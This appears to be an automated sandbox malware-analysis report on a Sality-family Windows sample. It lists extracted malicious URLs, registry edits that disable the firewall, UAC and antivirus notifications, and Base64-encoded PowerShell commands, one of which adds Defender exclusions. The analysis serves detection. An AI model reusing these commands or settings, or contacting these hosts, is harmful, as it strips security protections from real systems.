Analysis
-
max time kernel
31s -
max time network
32s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
28-12-2024 02:53
Static task
static1
Behavioral task
behavioral1
Sample
bl4ke.exe
Resource
win10v2004-20241007-en
General
-
Target
bl4ke.exe
-
Size
469KB
-
MD5
5d9e7031a5d7498bf610633a3d0f6981
-
SHA1
f11cd03ef06dd53e1cef1ff15693efc919030ac3
-
SHA256
e056b9ff0256dd40dac919efe92006ee49a3f50d222ab17e755c7dcdbc34a4fc
-
SHA512
0d846e552d8f2f344257bd6e65e4f3fbfc5d41d90892c9d19af3abe4dc4074a3c73e6802269800fdaaa90a0b0deb78bad40f0c1b75a34a6c840144f316945975
-
SSDEEP
6144:igQ9ahMwdrlDDX3RtZL7bieYMy4rZEqwpgJCNXFhHcuci:igQsMkrl5t0jINggJMFOuci
Malware Config
Extracted
sality
http://89.119.67.154/testo5/
http://kukutrustnet777.info/home.gif
http://kukutrustnet888.info/home.gif
http://kukutrustnet987.info/home.gif
http://www.klkjwre9fqwieluoi.info/
http://kukutrustnet777888.info/
Extracted
C:\Users\Admin\AppData\Local\Temp\YOUR_FILES_ARE_FUCKED.HTA
Signatures
-
Modifies firewall policy service 3 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" ApplicationDraw.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0" ApplicationDraw.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications = "1" ApplicationDraw.exe -
Sality family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ApplicationDraw.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" ApplicationDraw.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" ApplicationDraw.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" ApplicationDraw.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" ApplicationDraw.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" ApplicationDraw.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UacDisableNotify = "1" ApplicationDraw.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation bl4ke.exe -
Deletes itself 1 IoCs
pid Process 4296 ApplicationDraw.exe -
Executes dropped EXE 5 IoCs
pid Process 2020 gdihell.exe 600 Cronic.exe 4296 ApplicationDraw.exe 1236 FUCKSCREEN.exe 3044 hslshader.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" ApplicationDraw.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" ApplicationDraw.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" ApplicationDraw.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" ApplicationDraw.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UacDisableNotify = "1" ApplicationDraw.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc ApplicationDraw.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" ApplicationDraw.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ApplicationDraw.exe -
Enumerates connected drives 3 TTPs 15 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\J: ApplicationDraw.exe File opened (read-only) \??\L: ApplicationDraw.exe File opened (read-only) \??\E: ApplicationDraw.exe File opened (read-only) \??\I: ApplicationDraw.exe File opened (read-only) \??\R: ApplicationDraw.exe File opened (read-only) \??\O: ApplicationDraw.exe File opened (read-only) \??\Q: ApplicationDraw.exe File opened (read-only) \??\S: ApplicationDraw.exe File opened (read-only) \??\T: ApplicationDraw.exe File opened (read-only) \??\M: ApplicationDraw.exe File opened (read-only) \??\N: ApplicationDraw.exe File opened (read-only) \??\K: ApplicationDraw.exe File opened (read-only) \??\P: ApplicationDraw.exe File opened (read-only) \??\G: ApplicationDraw.exe File opened (read-only) \??\H: ApplicationDraw.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
resource yara_rule behavioral1/memory/4296-58-0x00000000025C0000-0x000000000364E000-memory.dmp upx behavioral1/memory/4296-61-0x00000000025C0000-0x000000000364E000-memory.dmp upx behavioral1/memory/4296-65-0x00000000025C0000-0x000000000364E000-memory.dmp upx behavioral1/memory/4296-77-0x00000000025C0000-0x000000000364E000-memory.dmp upx behavioral1/memory/4296-82-0x00000000025C0000-0x000000000364E000-memory.dmp upx behavioral1/memory/4296-79-0x00000000025C0000-0x000000000364E000-memory.dmp upx behavioral1/memory/4296-67-0x00000000025C0000-0x000000000364E000-memory.dmp upx behavioral1/memory/4296-78-0x00000000025C0000-0x000000000364E000-memory.dmp upx behavioral1/memory/4296-60-0x00000000025C0000-0x000000000364E000-memory.dmp upx behavioral1/memory/4296-109-0x00000000025C0000-0x000000000364E000-memory.dmp upx behavioral1/memory/4296-108-0x00000000025C0000-0x000000000364E000-memory.dmp upx behavioral1/memory/4296-112-0x00000000025C0000-0x000000000364E000-memory.dmp upx behavioral1/memory/4296-126-0x00000000025C0000-0x000000000364E000-memory.dmp upx behavioral1/memory/4296-127-0x00000000025C0000-0x000000000364E000-memory.dmp upx behavioral1/memory/4296-140-0x00000000025C0000-0x000000000364E000-memory.dmp upx behavioral1/memory/4296-141-0x00000000025C0000-0x000000000364E000-memory.dmp upx behavioral1/memory/4296-142-0x00000000025C0000-0x000000000364E000-memory.dmp upx behavioral1/memory/4296-143-0x00000000025C0000-0x000000000364E000-memory.dmp upx behavioral1/memory/4296-145-0x00000000025C0000-0x000000000364E000-memory.dmp upx behavioral1/memory/4296-156-0x00000000025C0000-0x000000000364E000-memory.dmp upx behavioral1/memory/4296-155-0x00000000025C0000-0x000000000364E000-memory.dmp upx behavioral1/memory/4296-158-0x00000000025C0000-0x000000000364E000-memory.dmp upx behavioral1/memory/4296-162-0x00000000025C0000-0x000000000364E000-memory.dmp upx behavioral1/memory/4296-163-0x00000000025C0000-0x000000000364E000-memory.dmp upx behavioral1/memory/4296-165-0x00000000025C0000-0x000000000364E000-memory.dmp upx behavioral1/memory/4296-172-0x00000000025C0000-0x000000000364E000-memory.dmp upx -
Drops file in Program Files directory 4 IoCs
description ioc Process File opened for modification C:\PROGRAM FILES\7-ZIP\Uninstall.exe ApplicationDraw.exe File opened for modification C:\PROGRAM FILES\7-ZIP\7z.exe ApplicationDraw.exe File opened for modification C:\PROGRAM FILES\7-ZIP\7zFM.exe ApplicationDraw.exe File opened for modification C:\PROGRAM FILES\7-ZIP\7zG.exe ApplicationDraw.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SYSTEM.INI ApplicationDraw.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bl4ke.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ApplicationDraw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gdihell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language hslshader.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings bl4ke.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 1956 powershell.exe 1956 powershell.exe 4296 ApplicationDraw.exe 4296 ApplicationDraw.exe 4676 powershell.exe 4676 powershell.exe 4296 ApplicationDraw.exe 4296 ApplicationDraw.exe 4296 ApplicationDraw.exe 4296 ApplicationDraw.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1956 powershell.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe Token: SeDebugPrivilege 4296 ApplicationDraw.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3708 wrote to memory of 1956 3708 bl4ke.exe 83 PID 3708 wrote to memory of 1956 3708 bl4ke.exe 83 PID 3708 wrote to memory of 1956 3708 bl4ke.exe 83 PID 3708 wrote to memory of 4676 3708 bl4ke.exe 85 PID 3708 wrote to memory of 4676 3708 bl4ke.exe 85 PID 3708 wrote to memory of 4676 3708 bl4ke.exe 85 PID 3708 wrote to memory of 2020 3708 bl4ke.exe 87 PID 3708 wrote to memory of 2020 3708 bl4ke.exe 87 PID 3708 wrote to memory of 2020 3708 bl4ke.exe 87 PID 3708 wrote to memory of 600 3708 bl4ke.exe 89 PID 3708 wrote to memory of 600 3708 bl4ke.exe 89 PID 3708 wrote to memory of 4296 3708 bl4ke.exe 90 PID 3708 wrote to memory of 4296 3708 bl4ke.exe 90 PID 3708 wrote to memory of 4296 3708 bl4ke.exe 90 PID 3708 wrote to memory of 1236 3708 bl4ke.exe 92 PID 3708 wrote to memory of 1236 3708 bl4ke.exe 92 PID 4296 wrote to memory of 772 4296 ApplicationDraw.exe 8 PID 4296 wrote to memory of 780 4296 ApplicationDraw.exe 9 PID 4296 wrote to memory of 336 4296 ApplicationDraw.exe 13 PID 4296 wrote to memory of 2996 4296 ApplicationDraw.exe 50 PID 4296 wrote to memory of 3060 4296 ApplicationDraw.exe 52 PID 4296 wrote to memory of 3168 4296 ApplicationDraw.exe 53 PID 4296 wrote to memory of 3548 4296 ApplicationDraw.exe 56 PID 4296 wrote to memory of 3676 4296 ApplicationDraw.exe 57 PID 4296 wrote to memory of 3880 4296 ApplicationDraw.exe 58 PID 4296 wrote to memory of 3968 4296 ApplicationDraw.exe 59 PID 4296 wrote to memory of 4036 4296 ApplicationDraw.exe 60 PID 4296 wrote to memory of 1112 4296 ApplicationDraw.exe 61 PID 4296 wrote to memory of 4180 4296 ApplicationDraw.exe 62 PID 4296 wrote to memory of 2600 4296 ApplicationDraw.exe 74 PID 4296 wrote to memory of 4464 4296 ApplicationDraw.exe 76 PID 4296 wrote to memory of 4016 4296 ApplicationDraw.exe 81 PID 4296 wrote to memory of 3708 4296 ApplicationDraw.exe 82 PID 4296 wrote to memory of 3708 4296 ApplicationDraw.exe 82 PID 4296 wrote to memory of 4676 4296 ApplicationDraw.exe 85 PID 4296 wrote to memory of 4676 4296 ApplicationDraw.exe 85 PID 4296 wrote to memory of 1748 4296 ApplicationDraw.exe 86 PID 4296 wrote to memory of 2020 4296 ApplicationDraw.exe 87 PID 4296 wrote to memory of 2020 4296 ApplicationDraw.exe 87 PID 4296 wrote to memory of 5056 4296 ApplicationDraw.exe 88 PID 4296 wrote to memory of 600 4296 ApplicationDraw.exe 89 PID 4296 wrote to memory of 1236 4296 ApplicationDraw.exe 92 PID 3708 wrote to memory of 3888 3708 bl4ke.exe 94 PID 3708 wrote to memory of 3888 3708 bl4ke.exe 94 PID 3708 wrote to memory of 3888 3708 bl4ke.exe 94 PID 3708 wrote to memory of 3044 3708 bl4ke.exe 95 PID 3708 wrote to memory of 3044 3708 bl4ke.exe 95 PID 3708 wrote to memory of 3044 3708 bl4ke.exe 95 PID 4296 wrote to memory of 772 4296 ApplicationDraw.exe 8 PID 4296 wrote to memory of 780 4296 ApplicationDraw.exe 9 PID 4296 wrote to memory of 336 4296 ApplicationDraw.exe 13 PID 4296 wrote to memory of 2996 4296 ApplicationDraw.exe 50 PID 4296 wrote to memory of 3060 4296 ApplicationDraw.exe 52 PID 4296 wrote to memory of 3168 4296 ApplicationDraw.exe 53 PID 4296 wrote to memory of 3548 4296 ApplicationDraw.exe 56 PID 4296 wrote to memory of 3676 4296 ApplicationDraw.exe 57 PID 4296 wrote to memory of 3880 4296 ApplicationDraw.exe 58 PID 4296 wrote to memory of 3968 4296 ApplicationDraw.exe 59 PID 4296 wrote to memory of 4036 4296 ApplicationDraw.exe 60 PID 4296 wrote to memory of 1112 4296 ApplicationDraw.exe 61 PID 4296 wrote to memory of 4180 4296 ApplicationDraw.exe 62 PID 4296 wrote to memory of 2600 4296 ApplicationDraw.exe 74 PID 4296 wrote to memory of 4464 4296 ApplicationDraw.exe 76 PID 4296 wrote to memory of 4016 4296 ApplicationDraw.exe 81 -
System policy modification 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ApplicationDraw.exe
Processes
-
C:\Windows\system32\fontdrvhost.exe"fontdrvhost.exe"1⤵PID:772
-
C:\Windows\system32\fontdrvhost.exe"fontdrvhost.exe"1⤵PID:780
-
C:\Windows\system32\dwm.exe"dwm.exe"1⤵PID:336
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2996
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:3060
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵PID:3168
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3548
-
C:\Users\Admin\AppData\Local\Temp\bl4ke.exe"C:\Users\Admin\AppData\Local\Temp\bl4ke.exe"2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3708 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAYgBlACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG0AZgBkACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAWQBPAFUAJwAnAFIARQAgAEYAVQBDAEsARQBEACAAQgBZACAAQgBMAEEASwBFACEAIQAhACAATABNAEEATwAgAEwATQBBAE8AIABMAE0AQQBPACcALAAnACcALAAnAE8ASwAnACwAJwBXAGEAcgBuAGkAbgBnACcAKQA8ACMAagB5AHUAIwA+AA=="3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1956
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAZAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAbAByACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAegBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAZwB2ACMAPgA="3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4676 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1748
-
-
-
C:\Users\Admin\AppData\Local\Temp\gdihell.exe"C:\Users\Admin\AppData\Local\Temp\gdihell.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2020 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:5056
-
-
-
C:\Users\Admin\AppData\Local\Temp\Cronic.exe"C:\Users\Admin\AppData\Local\Temp\Cronic.exe"3⤵
- Executes dropped EXE
PID:600
-
-
C:\Users\Admin\AppData\Local\Temp\ApplicationDraw.exe"C:\Users\Admin\AppData\Local\Temp\ApplicationDraw.exe"3⤵
- Modifies firewall policy service
- UAC bypass
- Windows security bypass
- Deletes itself
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4296
-
-
C:\Users\Admin\AppData\Local\Temp\FUCKSCREEN.exe"C:\Users\Admin\AppData\Local\Temp\FUCKSCREEN.exe"3⤵
- Executes dropped EXE
PID:1236 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4104
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\YOUR_FILES_ARE_FUCKED.HTA" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- System Location Discovery: System Language Discovery
PID:3888
-
-
C:\Users\Admin\AppData\Local\Temp\hslshader.exe"C:\Users\Admin\AppData\Local\Temp\hslshader.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3044 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4940
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3676
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3880
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:3968
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4036
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:1112
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4180
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca1⤵PID:2600
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4464
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca1⤵PID:4016
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x410 0x4bc1⤵PID:4092
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
1Windows Service
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
4Disable or Modify System Firewall
1Disable or Modify Tools
3Modify Registry
5Obfuscated Files or Information
1Command Obfuscation
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5d584df872086c0f7442a664a33d38fe5
SHA1f0fad100fda4e8bb82ce5bc7d03953605ac53a5d
SHA256fdb68980ecdb4c9b464cc6a07ec410b2c7dda5b01240a0a8c860e9a94fe372bc
SHA5125232ebc39075096fa6ae5ae6d5b7b4580003e0be87779281c27fc1e0646500c76ca2178205ccc06e3b85df02a3a88ddb864723a3978cc97a9d63fa07196cdd79
-
Filesize
17KB
MD5b6fc43c869bdd84dd65fa885413ff8c0
SHA15b0d4baff1fa16671834258aca224ea1b352f9f4
SHA256de8c28b1ad1f390625ff6cfebaf339fd1c5cfd11b78a639d3a54f3efc8e74eaf
SHA5124b19ce925f77d09c62f77ace8c3a54bb900422110246a0053aabd74ce4331de8acae5085e200e8983ae79312a5b7c831f227351a700e00c1b516f5e681371638
-
Filesize
85KB
MD5d2f7ee8114edbcb9aa332c1d8bbb9488
SHA1d97e993f1eaf8e4c990f06e9afa4f47efd9a5b06
SHA2560cb621f367e9aa5c046760be200dd0b5aa9b6e45c92f28adc73b34b369702f82
SHA512268ea70de1dfc4e97e0d057bd625e5080dd139564224d41dc23293b1eaf8205b359e3ab934fcc0b6ae1f0995cb9761ac5a84cdc2a8c40d0afa164eb7c6601243
-
Filesize
14KB
MD5726d50c3e3dd789d43664aa5c3c3f9de
SHA1f69e053040b09e422a712c4bf31ce20875186e31
SHA2568a865d95f2c90c97fe3d762608ebc8040033cac5882e5534675b6b1f056e9c19
SHA512872b347a0dd0cdb46959b9b41ad20dfc7dcfaf3cee8a27aa90b33700a44147edf631e03c3bd7ca8867dbcb2b02efc6c05ee0e8dd31062770c39d2ad13a1db56a
-
Filesize
11KB
MD5c8d6c1b9d0ab8940e827cc7f0f96f4b4
SHA1cdc2d69d48748b8836d6e2a4e58a370aebb55288
SHA256e9f500615b06fdb6b4eb4cd4e1664ba1da33fe3c2fc1eb0b1e561e06a20f1fbd
SHA51286b1e836fb79cf81cf15f7b889d4fcbee9de9f64cca741d012c5fe49fbf1bfc532bbbdb04114672765eff6cecc4ec4dd118fc1d2b52af1595020f09e64665d2a
-
Filesize
64KB
MD5f97a6c9d463f7005d28c273f7f369744
SHA15a594b71f3254fdd8fa1575b7898cd7cb8d0506c
SHA256729a7e9dfff763b95cae12e25875cd14acb4c74236d17494e32a72078df9931f
SHA512b9a1b151b241977130fa7fd7b3ce183c7836c31cc1c5d82ae5d77d2683bb2771020bc438fb4faa8d24d151234c5adadbd87a58b3be0e9f9ff556d26aaa8c79c7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
38KB
MD565389a4a1a5ec277c42d0dfacd59999b
SHA15098c44ec3a0c1be4d6d8f3dc5ddeeef73848c2c
SHA2568476bbe92dd772b4397ecb33fed7286f1b9ef698812b921d0113d5ead4607990
SHA5126fef9575d945f761d31406ce528e820945cb6f970eb78dc91c7a7da6e9efe6b2dbb1b55b96911d8115ac98dd95cf1f73a0cec13ad4cbe9750fe33df08e88f8b6
-
Filesize
39KB
MD57aa1ce5f332f6bde0ab29720fb768020
SHA10c42cce17644b24b8144f60559dc491b542e957d
SHA2566947123f789c83df8c9f3487fb7a2404da6255ee7391aecaede51647205aaadd
SHA51242c42203c5ba9319848be6ad716369d55e73a05909d6288eb074ae2ef5330f0d72e48c16d475ae8420445b2b9acd69762b8d8bb2b270beff998bc48e0ba69bc8